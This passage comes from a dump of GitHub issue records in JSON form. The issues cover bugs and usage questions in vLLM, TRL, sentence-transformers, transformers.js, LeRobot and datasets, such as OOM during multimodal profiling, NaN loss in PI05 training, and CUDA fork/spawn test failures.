`model_max_length` is passed in `tokenizer_kwargs` and then `max_seq_length` will be used as `max_length` instead of passed in kwargs https://github.com/huggingface/sentence-transformers/blob/ad28c0a982acc39c73abdf0019faca10f227ef28/sentence_transformers/models/Transformer.py#L319-L327\n\nProbably this can be fixed by\n\n```diff\nmax_seq_length = min(max_seq_length, self.tokenizer.model_max_length)\n```\n\n\nSource https://github.com/embeddings-benchmark/mteb/pull/3587#discussion_r2542434603\nI think this is cause of https://github.com/huggingface/sentence-transformers/issues/3187", "url": "https://github.com/huggingface/sentence-transformers/issues/3575", "state": "open", "labels": [], "created_at": "2025-11-19T16:42:27Z", "updated_at": "2025-11-20T13:47:13Z", "user": "Samoed" }, { "repo": "huggingface/trl", "number": 4546, "title": "Does TRL support PipelineRL for compute efficiency?", "body": "Hi \ud83d\udc4b,\n\nI'm trying to understand whether TRL currently supports (or plans to support) the PipelineRL approach described here:\n\n- Paper: [https://arxiv.org/pdf/2509.19128v2](https://arxiv.org/pdf/2509.19128v2?utm_source=chatgpt.com)\n- Overview: [https://arxiv.org/html/2509.19128](https://arxiv.org/html/2509.19128?utm_source=chatgpt.com)\n\nPipelineRL introduces an actor\u2013learner pipeline with in-flight weight updates, where actors keep generating while the learner updates weights concurrently. This reduces policy lag and improves GPU utilization for long-context RL runs.\n\n\nDoes TRL currently support this kind of pipelineRL workflow, or is there a recommended way to approximate it using the existing TRL trainers (GRPO + vLLM)?\n\nIf not, I'd love suggestions or best practices for building something similar on top of TRL.\n\nThanks! 
\ud83d\ude4f", "url": "https://github.com/huggingface/trl/issues/4546", "state": "open", "labels": [ "\u2728 enhancement", "\u2753 question" ], "created_at": "2025-11-19T12:39:29Z", "updated_at": "2025-11-22T12:43:54Z", "comments": 3, "user": "harisarang" }, { "repo": "vllm-project/vllm", "number": 28996, "title": "[Usage]: How to run a single data parallel deployment across multiple nodes without ray", "body": "### Your current environment\n\n2 Nodes, each node has 8 H20 GPUs.\n\n### How would you like to use vllm\n\nAccording to https://docs.vllm.ai/en/latest/serving/data_parallel_deployment/#internal-load-balancing\n\n```shell\n# node0\nvllm serve Qwen3-Coder-480B-A35B-Instruct --trust-remote-code --max-num-seqs 64 --max-model-len 131072 --port $PORT0 --host :: --data-parallel-size 2 --data-parallel-size-local 1 --data-parallel-address $NODE0_IPV6 --data-parallel-rpc-port $PORT1\n\n# node1\nvllm serve Qwen3-Coder-480B-A35B-Instruct --trust-remote-code --max-num-seqs 64 --max-model-len 131072 --headless --data-parallel-size 2 --data-parallel-size-local 1 --data-parallel-start-rank 1 --data-parallel-address $NODE0_IPV6 --data-parallel-rpc-port $NODE0_PORT1\n```\nbut all of them are hanging on waiting for init message from front-end.\n\n### Before submitting a new issue...\n\n- [x] Make sure you already searched for relevant issues, and asked the chatbot living at the bottom right corner of the [documentation page](https://docs.vllm.ai/en/latest/), which can answer lots of frequently asked questions.", "url": "https://github.com/vllm-project/vllm/issues/28996", "state": "closed", "labels": [ "usage" ], "created_at": "2025-11-19T06:47:22Z", "updated_at": "2025-11-27T06:17:22Z", "comments": 3, "user": "crystalww" }, { "repo": "vllm-project/vllm", "number": 28986, "title": "[Feature]: Fused Kernel for GPT-OSS Router", "body": "### \ud83d\ude80 The feature, motivation and pitch\n\n\"Image\"\n\n- Right now, we spend ~3.5% of the layer in the expert selection\n- The operation is unfused\n\nWrite a fused kernel like we have for deepseek grouped_topk\n\n### Alternatives\n\n- torch compile\n- triton\n- cuda\n\n### Additional context\n\n_No response_\n\n### Before submitting a new issue...\n\n- [x] Make sure you already searched for relevant issues, and asked the chatbot living at the bottom right corner of the [documentation page](https://docs.vllm.ai/en/latest/), which can answer lots of frequently asked questions.", "url": "https://github.com/vllm-project/vllm/issues/28986", "state": "open", "labels": [ "help wanted", "good first issue", "feature request" ], "created_at": "2025-11-19T03:18:25Z", "updated_at": "2025-12-12T16:16:37Z", "comments": 7, "user": "robertgshaw2-redhat" }, { "repo": "huggingface/transformers.js", "number": 1458, "title": "ONNX Backend Env variable", "body": "### Question\n\nHi, \n\nFor some context, I'm building an application that uses some of the models on huggingface as an annotation tool that helps create annotations for training a specialised model.\n\nAs for the specialised model, I am able to export them to onnx, and I was able to run this model in the same application, but I have to manually install the same onnxruntime-web version to be able to do so. I looked into the docs [here](https://huggingface.co/docs/transformers.js/api/backends/onnx#module_backends/onnx.createInferenceSession), but I cannot access these functions through `env.backends.onnx`. 
I've tried `console.log(env.backends.onnx.isONNXProxy())` and got \n```\nUncaught (in promise) TypeError: env.backends.onnx.isONNXProxy is not a function\n```\n\nIs there a way I can access the same inference session through this package? \n\n---------------------------------\n\nMy `package.json`\n\n```\n{\n \"dependencies\": {\n \"@huggingface/transformers\": \"3.7.5\",\n \"onnxruntime-web\": \"1.22.0-dev.20250409-89f8206ba4\"\n },\n}\n\n```", "url": "https://github.com/huggingface/transformers.js/issues/1458", "state": "open", "labels": [ "question" ], "created_at": "2025-11-19T01:26:02Z", "updated_at": "2025-11-25T15:36:13Z", "user": "Heinrik-20" }, { "repo": "vllm-project/vllm", "number": 28956, "title": "[Bug]: OOM when profiling multimodal model with multiple images", "body": "### Your current environment\n\nvLLM 0.11.0\n\n### \ud83d\udc1b Describe the bug\n\nAs per title. \n\nThe error log is as follows:\n```\n[multiproc_executor.py:671] Traceback (most recent call last):\n[multiproc_executor.py:671] File \"/root/miniconda3/lib/python3.11/site-packages/vllm/v1/executor/multiproc_executor.py\", line 666, in worker_busy_loop\n[multiproc_executor.py:671] output = func(*args, **kwargs)\n[multiproc_executor.py:671] ^^^^^^^^^^^^^^^^^^^^^\n[multiproc_executor.py:671] File \"/root/miniconda3/lib/python3.11/site-packages/torch/utils/_contextlib.py\", line 120, in decorate_context\n[multiproc_executor.py:671] return func(*args, **kwargs)\n[multiproc_executor.py:671] ^^^^^^^^^^^^^^^^^^^^^\n[multiproc_executor.py:671] File \"/root/miniconda3/lib/python3.11/site-packages/vllm/v1/worker/gpu_worker.py\", line 263, in determine_available_memory\n[multiproc_executor.py:671] self.model_runner.profile_run()\n[multiproc_executor.py:671] File \"/root/miniconda3/lib/python3.11/site-packages/vllm/v1/worker/gpu_model_runner.py\", line 3379, in profile_run\n[multiproc_executor.py:671] expanded = output.new_zeros(\n[multiproc_executor.py:671] ^^^^^^^^^^^^^^^^^\n[multiproc_executor.py:671] torch.OutOfMemoryError: CUDA out of memory. Tried to allocate 3.00 GiB. GPU 6 has a total capacity of 139.81 GiB of which 2.58 GiB is free. Including non-PyTorch memory, this process has 137.21 GiB memory in use. Of the allocated memory 134.77 GiB is allocated by PyTorch, and 255.64 MiB is reserved by PyTorch but unallocated. If reserved but unallocated memory is large try setting PYTORCH_CUDA_ALLOC_CONF=expandable_segments:True to avoid fragmentation. 
See documentation for Memory Management (https://pytorch.org/docs/stable/notes/cuda.html#environment-variables)\n```\nLooks like we only need **ONE** encoder cache with shape `(encoder_budget, encoder_output_shape[-1])` rather than `len(dummy_encoder_outputs)` ones.\nhttps://github.com/vllm-project/vllm/blob/da8dadf68b5a2af849e7c5fd35ce9b8525d8d398/vllm/v1/worker/gpu_model_runner.py#L4128-L4144\n\n\n### Before submitting a new issue...\n\n- [x] Make sure you already searched for relevant issues, and asked the chatbot living at the bottom right corner of the [documentation page](https://docs.vllm.ai/en/latest/), which can answer lots of frequently asked questions.", "url": "https://github.com/vllm-project/vllm/issues/28956", "state": "closed", "labels": [ "bug" ], "created_at": "2025-11-18T17:36:55Z", "updated_at": "2025-11-25T12:38:37Z", "comments": 7, "user": "imShZh" }, { "repo": "huggingface/lerobot", "number": 2475, "title": "Why there is difference between async inference and local inference in image resize?", "body": "I read code between `src/lerobot/async_inference/policy_server.py` and `src/lerobot/scripts/lerobot_record.py`. I found difference in these 2 code about inference which causes different image shape\n1. `src/lerobot/scripts/lerobot_record.py` use this to deal with observation\nAnd `prepare_observation_for_inference` is like this:\n```python\ndef prepare_observation_for_inference(\n observation: dict[str, np.ndarray],\n device: torch.device,\n task: str | None = None,\n robot_type: str | None = None,\n) -> RobotObservation:\n for name in observation:\n observation[name] = torch.from_numpy(observation[name])\n if \"image\" in name:\n observation[name] = observation[name].type(torch.float32) / 255\n observation[name] = observation[name].permute(2, 0, 1).contiguous()\n observation[name] = observation[name].unsqueeze(0)\n observation[name] = observation[name].to(device)\n observation[\"task\"] = task if task else \"\"\n observation[\"robot_type\"] = robot_type if robot_type else \"\"\n return observation\n```\n\nHere no **resize** operation in images i think. \n\n2. in async_inference policy_server.py,it uses\nBut here function`prepare_raw_observation` makes sense on image shape\n```python\ndef prepare_raw_observation(\n robot_obs: RawObservation,\n lerobot_features: dict[str, dict],\n policy_image_features: dict[str, PolicyFeature],\n) -> Observation:\n \"\"\"Matches keys from the raw robot_obs dict to the keys expected by a given policy (passed as\n policy_image_features).\"\"\"\n # 1. {motor.pos1:value1, motor.pos2:value2, ..., laptop:np.ndarray} ->\n # -> {observation.state:[value1,value2,...], observation.images.laptop:np.ndarray}\n lerobot_obs = make_lerobot_observation(robot_obs, lerobot_features)\n # 2. 
Greps all observation.images.<> keys\n image_keys = list(filter(is_image_key, lerobot_obs))\n # state's shape is expected as (B, state_dim)\n state_dict = {OBS_STATE: extract_state_from_raw_observation(lerobot_obs)}\n image_dict = {\n image_k: extract_images_from_raw_observation(lerobot_obs, image_k) for image_k in image_keys\n }\n # Turns the image features to (C, H, W) with H, W matching the policy image features.\n # This reduces the resolution of the images\n image_dict = {\n key: resize_robot_observation_image(torch.tensor(lerobot_obs[key]), policy_image_features[key].shape)\n for key in image_keys\n }\n if \"task\" in robot_obs:\n state_dict[\"task\"] = robot_obs[\"task\"]\n return {**state_dict, **image_dict}\n```\nHere the shape of observation images is modified to policy config\n```python\ndef resize_robot_observation_image(image: torch.tensor, resize_dims: tuple[int, int, int]) -> torch.tensor:\n assert image.ndim == 3, f\"Image must be (C, H, W)! Received {image.shape}\"\n # (H, W, C) -> (C, H, W) for resizing from robot obsevation resolution to policy image resolution\n image = image.permute(2, 0, 1)\n dims = (resize_dims[1], resize_dims[2])\n # Add batch dimension for interpolate: (C, H, W) -> (1, C, H, W)\n image_batched = image.unsqueeze(0)\n # Interpolate and remove batch dimension: (1, C, H, W) -> (C, H, W)\n resized = torch.nn.functional.interpolate(image_batched, size=dims, mode=\"bilinear\", align_corners=False)\n\n return resized.squeeze(0)\n``` \n\nI found this when I can inference correctly locally by made weird action outputs from async inference. it must be caused by my didn't resize input image when training. -.-\n\n\nversion:deb9596bd3796c03ae3a5a6b81b63c1dba296256\n", "url": "https://github.com/huggingface/lerobot/issues/2475", "state": "open", "labels": [ "question" ], "created_at": "2025-11-18T14:32:17Z", "updated_at": "2025-11-24T02:23:13Z", "user": "milong26" }, { "repo": "vllm-project/vllm", "number": 28943, "title": "[Usage]: what's the right way to run embedding model in vllm 0.11.0", "body": "### Your current environment\n\n```text\nThe output of `python collect_env.py`\n```\nin vllm 0.8.7\uff0cI use following code to run local vllm\uff0call is right\uff1a\n```\n self.engine_args = EngineArgs(\n model=self.model_path,\n dtype='half',\n task=\"embed\",\n trust_remote_code=True,\n limit_mm_per_prompt={\"image\": 1},\n )\n e = asdict(self.engine_args)\n self.max_len = 100\n self.llm = LLM(**e)\n out = self.llm.embed(datas)\n```\nBut in vllm 0.11.0 according to the document https://www.aidoczh.com/vllm/models/pooling_models.html\uff0cit use runner=='pooling' to run embedding task. What's the diffenence? Could the 'task' arg 'embed' still take effect?\n\n### How would you like to use vllm\n\nI want to run inference of a [specific model](put link here). 
I don't know how to integrate it with vllm.\n\n\n### Before submitting a new issue...\n\n- [x] Make sure you already searched for relevant issues, and asked the chatbot living at the bottom right corner of the [documentation page](https://docs.vllm.ai/en/latest/), which can answer lots of frequently asked questions.", "url": "https://github.com/vllm-project/vllm/issues/28943", "state": "open", "labels": [ "usage" ], "created_at": "2025-11-18T13:47:57Z", "updated_at": "2025-11-20T10:49:12Z", "comments": 3, "user": "neverneverendup" }, { "repo": "huggingface/trl", "number": 4541, "title": "Is attn_implementation=sdpa not supported when using SFTTrainer with mllama?", "body": "When trying to use `sdpa` with mllama I get an error using the default collator. Upon writing my own collator it works.\nWhen using `eager` implementation it gives cuda oom error. Is `sdpa` not supported?", "url": "https://github.com/huggingface/trl/issues/4541", "state": "open", "labels": [], "created_at": "2025-11-18T11:57:01Z", "updated_at": "2025-11-18T11:57:01Z", "comments": 0, "user": "osaidr" }, { "repo": "vllm-project/vllm", "number": 28930, "title": "[Usage]: How to build a qwen3vl embedding model with a custom mlp layer on the top use vllm?", "body": "### Your current environment\n\n```text\nThe output of `python collect_env.py`\n\n```\n\nHi friends! I train a sft model built upon qwen3vl 2b model, we put a mlp layer on it to compress the embedding size of the backbone model. Now I want to use vllm 0.11.0 to serve it but I meet some confuse. Here is my custom class code\n\n```\nfrom argparse import Namespace\nfrom dataclasses import asdict\nfrom typing import Literal, NamedTuple, Optional, TypedDict, Union, get_args\nimport torch\nimport torch.nn as nn\nfrom vllm.model_executor.models.qwen3_vl import Qwen3VLForConditionalGeneration\n\nfrom vllm.v1.pool.metadata import PoolingMetadata\nfrom vllm.v1.sample.metadata import SamplingMetadata\n\nfrom vllm.config import VllmConfig\nfrom vllm.multimodal import MULTIMODAL_REGISTRY\n\n\nclass CustomQwenVL3BPool(nn.Module):\n def __init__(\n self\n ):\n super().__init__()\n self.out = torch.nn.Sequential(\n torch.nn.Linear(2048, 512),\n torch.nn.SiLU(),\n torch.nn.Linear(512, 128)\n )\n\n def get_prompt_lens(self,\n hidden_states: Union[torch.Tensor, list[torch.Tensor]],\n pooling_metadata: PoolingMetadata,\n ) -> torch.Tensor:\n return pooling_metadata.prompt_lens\n\n\n def forward(\n self,\n hidden_states: torch.Tensor,\n pooling_metadata: PoolingMetadata,\n ) -> Union[list[torch.Tensor], torch.Tensor]:\n # 1 \u63d0\u53d6lasttoken\n prompt_lens = self.get_prompt_lens(hidden_states, pooling_metadata)\n last_token_flat_indices = torch.cumsum(prompt_lens, dim=0) - 1\n hidden_states = hidden_states[last_token_flat_indices]\n # 2 mlp\u538b\u7f29\u7ef4\u5ea6\n mlp_output = self.out(hidden_states)\n # 3 \u6b63\u5219\u5316\u8f93\u51fa\uff0c\u9700\u8981check\u4e0bvllm\u662f\u5426\u4f1a\u518d\u6b21norm\n normalized_output = F.normalize(mlp_output, p=2, dim=-1)\n return normalized_output\n \n\nclass CustomQwen3VLForConditionalGeneration(Qwen3VLForConditionalGeneration):\n def __init__(self, *, vllm_config: VllmConfig, prefix: str = \"\"):\n super().__init__(vllm_config=vllm_config, prefix=prefix)\n self._pooler = CustomQwenVL3BPool()\n```\nWhen I run above code using local mode of vllm , error log says **\"[adapters.py:79] ST projector loading failed\".Does anybody know why?** BTW\uff0cwhat's the best practice to make a custom embedding model with mlp in vllm 0.11.0\n\n### How 
would you like to use vllm\n\nI want to run inference of a [specific model](put link here). I don't know how to integrate it with vllm.\n\n\n### Before submitting a new issue...\n\n- [x] Make sure you already searched for relevant issues, and asked the chatbot living at the bottom right corner of the [documentation page](https://docs.vllm.ai/en/latest/), which can answer lots of frequently asked questions.", "url": "https://github.com/vllm-project/vllm/issues/28930", "state": "closed", "labels": [ "usage" ], "created_at": "2025-11-18T10:32:07Z", "updated_at": "2025-12-23T04:49:30Z", "comments": 10, "user": "neverneverendup" }, { "repo": "vllm-project/vllm", "number": 28929, "title": "[Usage]: How", "body": "=", "url": "https://github.com/vllm-project/vllm/issues/28929", "state": "closed", "labels": [ "usage" ], "created_at": "2025-11-18T10:26:17Z", "updated_at": "2025-11-18T10:30:53Z", "comments": 0, "user": "neverneverendup" }, { "repo": "huggingface/datasets", "number": 7869, "title": "Why does dataset merge fail when tools have different parameters?", "body": "Hi, I have a question about SFT (Supervised Fine-tuning) for an agent model.\n\nSuppose I want to fine-tune an agent model that may receive two different tools: tool1 and tool2. These tools have different parameters and types in their schema definitions.\n\nWhen I try to merge datasets containing different tool definitions, I get the following error:\n\nTypeError: Couldn't cast array of type\nstruct, ... , servicerId: struct>\nto\n{\n 'refundFee': {'description': Value(dtype='string'), 'type': Value(dtype='string')},\n ...\n 'templateId': {'description': Value(dtype='string'), 'type': Value(dtype='string')}\n}\nFrom my understanding, the merge fails because the tools column's nested structure is different across datasets \u2014 e.g., one struct contains an extra field servicerId while the other does not. This causes HuggingFace Datasets (and its underlying Apache Arrow schema) to reject the merge.\n\nMy question is: why is it designed this way?\n\nIs this strict schema matching a hard requirement of the library?\nIs there a recommended way to merge datasets with different tool schemas (different parameters and types)?\nFor an agent model supporting multiple tools, what's the best practice for preparing/merging training data without losing flexibility?\nAny guidance or design rationale would be greatly appreciated. 
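One common workaround, as a minimal sketch (assuming the differing column is called `tools`; `stringify_tools` is a hypothetical helper): serialize the nested structs to JSON strings so both datasets share the same flat Arrow schema before merging, then parse the column back with `json.loads` when building prompts.

```python
import json
from datasets import Dataset, concatenate_datasets

def stringify_tools(example: dict) -> dict:
    # Hypothetical helper: replace the nested struct with its JSON text;
    # the column type becomes a plain string, so schemas match across datasets.
    example["tools"] = json.dumps(example["tools"], ensure_ascii=False)
    return example

# Two toy datasets whose "tools" structs have different fields:
ds1 = Dataset.from_dict({"tools": [{"name": "tool1", "refundFee": {"type": "string"}}]})
ds2 = Dataset.from_dict({"tools": [{"name": "tool2", "servicerId": {"type": "string"}}]})

merged = concatenate_datasets([ds1.map(stringify_tools), ds2.map(stringify_tools)])
print(merged["tools"])  # two JSON strings; json.loads them when needed
```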
Thanks!", "url": "https://github.com/huggingface/datasets/issues/7869", "state": "open", "labels": [], "created_at": "2025-11-18T08:33:04Z", "updated_at": "2025-11-30T03:52:07Z", "comments": 1, "user": "hitszxs" }, { "repo": "vllm-project/vllm", "number": 28903, "title": "[Bug]: vllm inference on qwen3-vl when use_upstream_fa is False", "body": "### Your current environment\n\npip show torch vllm flash-attn\n\nName: torch\nVersion: 2.8.0\n\n---\nName: vllm\nVersion: 0.11.0\n\n\nName: flash_attn\nVersion: 2.8.3\n\n\n\n### \ud83d\udc1b Describe the bug\n\nunit-test code as the follows,\nwhen simple qwen3-0.6B can run; but qwen3-vl-4b not run\n```python\n#coding=utf-8\n\"\"\"\n\u5199\u5355\u5143\u6d4b\u8bd5\u6765\u9a8c\u8bc1FA\u548cVLLM\u7684\u53ef\u7528\u6027\u548c\u517c\u5bb9\u6027\n\"\"\"\n\nimport torch\nfrom flash_attn import flash_attn_func\nimport unittest\nimport vllm\n# from vllm.attention.backends import get_attn_backend\n\nclass TestFA_VLLM(unittest.TestCase):\n def testFA(self,):\n # \u68c0\u67e5CUDA\u662f\u5426\u53ef\u7528\u53ca\u8bbe\u5907\n print(f\"CUDA available: {torch.cuda.is_available()}\")\n print(f\"Current device: {torch.cuda.current_device()}\")\n print(f\"Device name: {torch.cuda.get_device_name()}\")\n\n # \u5c1d\u8bd5\u521b\u5efa\u4e00\u4e2a\u7b80\u5355\u7684\u5f20\u91cf\u5e76\u79fb\u52a8\u5230GPU\n try:\n q = torch.randn(1, 1, 16, 64, dtype=torch.float16, device='cuda')\n k = torch.randn(1, 1, 16, 64, dtype=torch.float16, device='cuda')\n v = torch.randn(1, 1, 16, 64, dtype=torch.float16, device='cuda')\n output = flash_attn_func(q, k, v)\n print(\"FlashAttention test passed!\")\n except Exception as e:\n print(f\"FlashAttention test failed: {e}\")\n \n def oriTestVLLM(self,):\n # \u6253\u5370\u5f53\u524d\u4f7f\u7528\u7684attention\u540e\u7aef\n print(\"Available CUDA devices:\", torch.cuda.device_count())\n print(\"Current device:\", torch.cuda.current_device())\n print(\"Device name:\", torch.cuda.get_device_name())\n\n # \u68c0\u67e5vLLM\u914d\u7f6e\n print(\"vLLM version:\", vllm.__version__)\n\n # \u5c1d\u8bd5\u521b\u5efa\u4e00\u4e2a\u5c0f\u6a21\u578b\u6765\u89e6\u53d1\u540e\u7aef\u521d\u59cb\u5316\n try:\n from vllm import LLM\n llm = LLM(model=\"Qwen/Qwen3-0.6B\", max_model_len=256)\n print(\"vLLM\u521d\u59cb\u5316\u6210\u529f!\")\n prompt = \"\u8fd9\u662f\u4e00\u4e2a\u6d4b\u8bd5\u63d0\u793a\u3002\"\n response = llm.generate(prompt)\n print(\"rollout\u6d4b\u8bd5\u6210\u529f! 
\u751f\u6210\u7684\u6587\u672c:\", response)\n except Exception as e:\n print(f\"vLLM\u521d\u59cb\u5316\u5931\u8d25: {e}\")\n \n def testVLLM(self,):\n # \u6253\u5370\u5f53\u524d\u4f7f\u7528\u7684attention\u540e\u7aef\n print(\"Available CUDA devices:\", torch.cuda.device_count())\n print(\"Current device:\", torch.cuda.current_device())\n print(\"Device name:\", torch.cuda.get_device_name())\n\n # \u5c1d\u8bd5\u521b\u5efa\u4e00\u4e2a\u5c0f\u6a21\u578b\u6765\u89e6\u53d1\u540e\u7aef\u521d\u59cb\u5316\n try:\n MODEL_PATH = \"Qwen/Qwen3-VL-4B-Instruct\"\n from vllm import LLM\n from vllm import LLM, SamplingParams\n from vllm.assets.image import ImageAsset # vLLM \u5185\u7f6e\u5de5\u5177\uff0c\u5e2e\u4f60\u628a\u8def\u5f84 \u2192 PIL\n from vllm.assets.video import VideoAsset # \u5982\u679c\u4ee5\u540e\u60f3\u52a0\u89c6\u9891\u540c\u7406\n\n # \u968f\u4fbf\u7528\u4e00\u5f20\u56fe\u5c31\u884c\n image_path = \"\"\n from PIL import Image\n image = Image.open(image_path)\n # \u65b9\u5f0f B\uff1aURL\n # image = ImageAsset(\"image\", \"https://xxx.jpg\").pil_image\n\n # Qwen3-VL \u8981\u6c42\u7684\u5bf9\u8bdd\u6a21\u677f\n messages = [\n {\n \"role\": \"user\",\n \"content\": [\n {\"type\": \"image\", \"image\": image}, # \u56fe\u50cf\u5b57\u6bb5\n {\"type\": \"text\", \"text\": \"\u8bf7\u63cf\u8ff0\u8fd9\u5f20\u56fe\u7247\u3002\"}\n ]\n }\n ]\n # \u7528 transformers \u7684 apply_chat_template \u628a messages \u2192 \u6a21\u578b\u8f93\u5165\n from transformers import AutoTokenizer\n tok = AutoTokenizer.from_pretrained(MODEL_PATH)\n prompt = tok.apply_chat_template(\n messages,\n tokenize=False,\n add_generation_prompt=True\n )\n # ---------- \u2463 \u751f\u6210 ----------\n sampling_params = SamplingParams(\n temperature=0.7,\n max_tokens=512,\n stop_token_ids=[tok.eos_token_id, tok.convert_tokens_to_ids(\"<|im_end|>\")]\n )\n\n llm = LLM(model=MODEL_PATH, max_model_len=4096, \n limit_mm_per_prompt={\"image\": 1, \"video\": 0}, # \u6bcf\u5f20 prompt \u6700\u591a 1 \u5f20\u56fe\n dtype=\"bfloat16\", # A100/H100 \u53ef\u5f00\uff1b\u6d88\u8d39\u5361\u7528 \"float16\"\n gpu_memory_utilization=0.9,)\n print(\"vLLM\u521d\u59cb\u5316\u6210\u529f!\")\n \n\n outputs = llm.generate(\n {\"prompt\": prompt, \"multi_modal_data\": {\"image\": image}}, # \u5173\u952e\uff1a\u628a\u56fe\u4e5f\u4f20\u8fdb\u53bb\n sampling_params=sampling_params\n )\n\n response = outputs[0].outputs[0].text\n print(\"rollout\u6d4b\u8bd5\u6210\u529f! \u751f\u6210\u7684\u6587\u672c:\", response)\n except Exception as e:\n print(f\"vLLM\u521d\u59cb\u5316\u5931\u8d25: {e}\")\n\nif __name__ == \"__main__\":\n unittest.main()\n```\n\nerror is :vllm/vllm_flash_attn/flash_attn_interface.py\", line 233, in flash_attn_varlen_func [rank0]: out, softmax_lse = torch.ops._vllm_fa2_C.varlen_fwd( [rank0]: File \"/usr/local/lib/python3.10/dist-packages/torch/_ops.py\", line 1243, in __call__ [rank0]: return self._op(*args, **kwargs) [rank0]: torch.AcceleratorError: CUDA error: the provided PTX was compiled with an unsupported toolchain.\n\n\nThen, I review the code in https://github.com/vllm-project/vllm/blob/main/vllm/model_executor/models/qwen3_vl.py#L375\n\nit default set use_upstream_fa = False, when I change it to True, it works? 
the vllm version is 0.11.0\n\n### Before submitting a new issue...\n\n-", "url": "https://github.com/vllm-project/vllm/issues/28903", "state": "closed", "labels": [ "bug" ], "created_at": "2025-11-18T03:54:11Z", "updated_at": "2025-11-18T08:18:09Z", "comments": 1, "user": "hedes1992" }, { "repo": "huggingface/lerobot", "number": 2465, "title": "loss:nan grdn:nan How to solve the gradient explosion problem in PI05 training?", "body": "When training Pi05 using Lerobot, has anyone encountered a situation where gradients explode immediately after training? Errors occur when the batch_size is set to 64 or 32. How can this be resolved? \n\nBelow are my training commands and error logs.\n\npython src/lerobot/scripts/lerobot_train.py --dataset.repo_id=aa_merged280 --policy.type=pi05 \\\n--output_dir=./outputs/pi05_training2 --job_name=pi05_training2 \\\n--policy.pretrained_path=lerobot/pi05_base --policy.compile_model=true \\\n--policy.gradient_checkpointing=true --wandb.enable=true --policy.dtype=bfloat16 \\\n--steps=100000 --policy.device=cuda --batch_size=32 --policy.push_to_hub=false\n\nINFO 2025-11-17 22:07:40 ot_train.py:351 step:200 smpl:6K ep:9 epch:0.03 loss:nan grdn:nan lr:2.5e-06 updt_s:4.478 data_s:0.038\nWARNING 2025-11-17 22:07:40 db_utils.py:141 WandB logging of key \"loss_per_dim\" was ignored as its type \"\" is not handled by this wrapper.\nINFO 2025-11-17 22:22:38 ot_train.py:351 step:400 smpl:13K ep:18 epch:0.06 loss:nan grdn:nan lr:7.5e-06 updt_s:4.458 data_s:0.022\nWARNING 2025-11-17 22:22:38 db_utils.py:141 WandB logging of key \"loss_per_dim\" was ignored as its type \"\" is not handled by this wrapper.\nINFO 2025-11-17 22:37:34 ot_train.py:351 step:600 smpl:19K ep:27 epch:0.10 loss:nan grdn:nan lr:1.3e-05 updt_s:4.456 data_s:0.022\nWARNING 2025-11-17 22:37:34 db_utils.py:141 WandB logging of key \"loss_per_dim\" was ignored as its type \"\" is not handled by this wrapper.\nINFO 2025-11-17 22:52:31 ot_train.py:351 step:800 smpl:26K ep:36 epch:0.13 loss:nan grdn:nan lr:1.8e-05 updt_s:4.456 data_s:0.022\nWARNING 2025-11-17 22:52:31 db_utils.py:141 WandB logging of key \"loss_per_dim\" was ignored as its type \"\" is not handled by this wrapper.\nINFO 2025-11-17 23:07:29 ot_train.py:351 step:1K smpl:32K ep:45 epch:0.16 loss:nan grdn:nan lr:2.3e-05 updt_s:4.459 data_s:0.022\n", "url": "https://github.com/huggingface/lerobot/issues/2465", "state": "open", "labels": [ "bug", "policies", "training" ], "created_at": "2025-11-18T03:46:28Z", "updated_at": "2025-12-03T16:13:56Z", "user": "Lilgeneric" }, { "repo": "huggingface/lerobot", "number": 2464, "title": "Questions about Pi0.5 Model Training Details and High Level Planning Implementation", "body": "Hello, while studying the Pi0.5 model, I have two questions regarding the model implementation that I would like to ask you:\n1\u3001The paper mentions that the model adopts two-stage pre-training and designs a comprehensive loss function. However, when checking the compute_loss part in the open-source code, it is found that currently only the action loss is calculated, and the loss related to the VLM (Vision-Language Model) in the pre-training stage is not reflected. I would like to confirm whether this part is implemented elsewhere in the code or if there are other design considerations?\n2\u3001The ablation experiments in the paper show that the jointly trained Pi0.5 performs excellently in explicit and implicit High Level planning, even better than GPT4 and manual upper-level planning. 
However, I have not been able to find the implementation of the High Level planning step in the open-source model code. I would like to know how this functionality is reflected in the code?\nLooking forward to your reply, thank you!", "url": "https://github.com/huggingface/lerobot/issues/2464", "state": "open", "labels": [ "question", "training" ], "created_at": "2025-11-18T01:27:59Z", "updated_at": "2025-11-20T10:45:34Z", "user": "Ginldaj" }, { "repo": "vllm-project/vllm", "number": 28876, "title": "[CI Failure]: should test_cumem.py use spawn or fork in cuda?", "body": "### Name of failing test\n\ntests/basic_correctness/test_cumem.py\n\n### Basic information\n\n- [ ] Flaky test\n- [x] Can reproduce locally\n- [ ] Caused by external libraries (e.g. bug in `transformers`)\n\n### \ud83e\uddea Describe the failing test\n\nThe test only fails for me locally when I use the vllm main branch, and on the CI of my PR. I think the error is caused by the cuda tests using `fork` instead of `spawn`. In the CI there is a line that tries to force spawn: https://github.com/vllm-project/vllm/blob/f2b8e1c5510cf3621dc4b910f0eba5289d9fee88/.buildkite/test-pipeline.yaml#L99-L100, but it looks like it's not effective. I looked at the function that decides whether to use fork or spawn: https://github.com/vllm-project/vllm/blob/f8b19c0ffd65f7f6f01a0da4a39b6890f5db40cb/tests/utils.py#L1027 and I don't think it looks at the flag `VLLM_WORKER_MULTIPROC_METHOD`. The issue doesn't repro in the main vllm CI, though. Wondering how we should fix this?\n\n```\nFAILED basic_correctness/test_cumem.py::test_python_error - RuntimeError: Cannot re-initialize CUDA in forked subprocess. To use CUDA with multiprocessing, you must use the 'spawn' start method\nFAILED basic_correctness/test_cumem.py::test_basic_cumem - RuntimeError: Cannot re-initialize CUDA in forked subprocess. To use CUDA with multiprocessing, you must use the 'spawn' start method\nFAILED basic_correctness/test_cumem.py::test_cumem_with_cudagraph - RuntimeError: Cannot re-initialize CUDA in forked subprocess. To use CUDA with multiprocessing, you must use the 'spawn' start method\nFAILED basic_correctness/test_cumem.py::test_end_to_end[hmellor/tiny-random-LlamaForCausalLM] - RuntimeError: Cannot re-initialize CUDA in forked subprocess. To use CUDA with multiprocessing, you must use the 'spawn' start method\nFAILED basic_correctness/test_cumem.py::test_end_to_end[facebook/opt-125m] - RuntimeError: Cannot re-initialize CUDA in forked subprocess. To use CUDA with multiprocessing, you must use the 'spawn' start method\nFAILED basic_correctness/test_cumem.py::test_deep_sleep - RuntimeError: Cannot re-initialize CUDA in forked subprocess. To use CUDA with multiprocessing, you must use the 'spawn' start method\nFAILED basic_correctness/test_cumem.py::test_deep_sleep_async - RuntimeError: Cannot re-initialize CUDA in forked subprocess.
